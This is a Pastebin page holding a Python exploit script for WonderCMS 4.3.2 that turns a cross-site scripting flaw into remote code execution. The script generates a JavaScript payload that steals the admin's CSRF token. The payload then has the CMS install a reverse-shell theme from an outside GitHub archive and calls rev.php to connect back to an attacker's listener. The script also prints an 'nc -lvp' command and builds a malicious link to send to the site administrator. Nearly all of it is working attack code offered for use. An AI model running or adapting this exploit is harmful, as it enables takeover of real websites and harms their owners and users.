Advertisement
FlyFar

Wondercms 4.3.2 - XSS to RCE Exploit

Feb 22nd, 2024
999
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.19 KB | Cybersecurity | 0 0
  1. # Author: prodigiousMind
  2. # Exploit: Wondercms 4.3.2 XSS to RCE
  3.  
  4.  
  5. import sys
  6. import requests
  7. import os
  8. import bs4
  9.  
  10. if (len(sys.argv)<4): print("usage: python3 exploit.py loginURL IP_Address Port\nexample: python3 exploit.py http://localhost/wondercms/loginURL 192.168.29.165 5252")
  11. else:
  12.   data = '''
  13. var url = "'''+str(sys.argv[1])+'''";
  14. if (url.endsWith("/")) {
  15. url = url.slice(0, -1);
  16. }
  17. var urlWithoutLog = url.split("/").slice(0, -1).join("/");
  18. var urlWithoutLogBase = new URL(urlWithoutLog).pathname;
  19. var token = document.querySelectorAll('[name="token"]')[0].value;
  20. var urlRev = urlWithoutLogBase+"/?installModule=https://github.com/prodigiousMind/revshell/archive/refs/heads/main.zip&directoryName=violet&type=themes&token=" + token;
  21. var xhr3 = new XMLHttpRequest();
  22. xhr3.withCredentials = true;
  23. xhr3.open("GET", urlRev);
  24. xhr3.send();
  25. xhr3.onload = function() {
  26. if (xhr3.status == 200) {
  27.   var xhr4 = new XMLHttpRequest();
  28.   xhr4.withCredentials = true;
  29.   xhr4.open("GET", urlWithoutLogBase+"/themes/revshell-main/rev.php");
  30.   xhr4.send();
  31.   xhr4.onload = function() {
  32.     if (xhr4.status == 200) {
  33.       var ip = "'''+str(sys.argv[2])+'''";
  34.       var port = "'''+str(sys.argv[3])+'''";
  35.       var xhr5 = new XMLHttpRequest();
  36.       xhr5.withCredentials = true;
  37.       xhr5.open("GET", urlWithoutLogBase+"/themes/revshell-main/rev.php?lhost=" + ip + "&lport=" + port);
  38.       xhr5.send();
  39.      
  40.     }
  41.   };
  42. }
  43. };
  44. '''
  45.   try:
  46.     open("xss.js","w").write(data)
  47.     print("[+] xss.js is created")
  48.     print("[+] execute the below command in another terminal\n\n----------------------------\nnc -lvp "+str(sys.argv[3]))
  49.     print("----------------------------\n")
  50.     XSSlink = str(sys.argv[1]).replace("loginURL","index.php?page=loginURL?")+"\"></form><script+src=\"http://"+str(sys.argv[2])+":8000/xss.js\"></script><form+action=\""
  51.     XSSlink = XSSlink.strip(" ")
  52.     print("send the below link to admin:\n\n----------------------------\n"+XSSlink)
  53.     print("----------------------------\n")
  54.  
  55.     print("\nstarting HTTP server to allow the access to xss.js")
  56.     os.system("python3 -m http.server\n")
  57.   except: print(data,"\n","//write this to a file")
  58.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement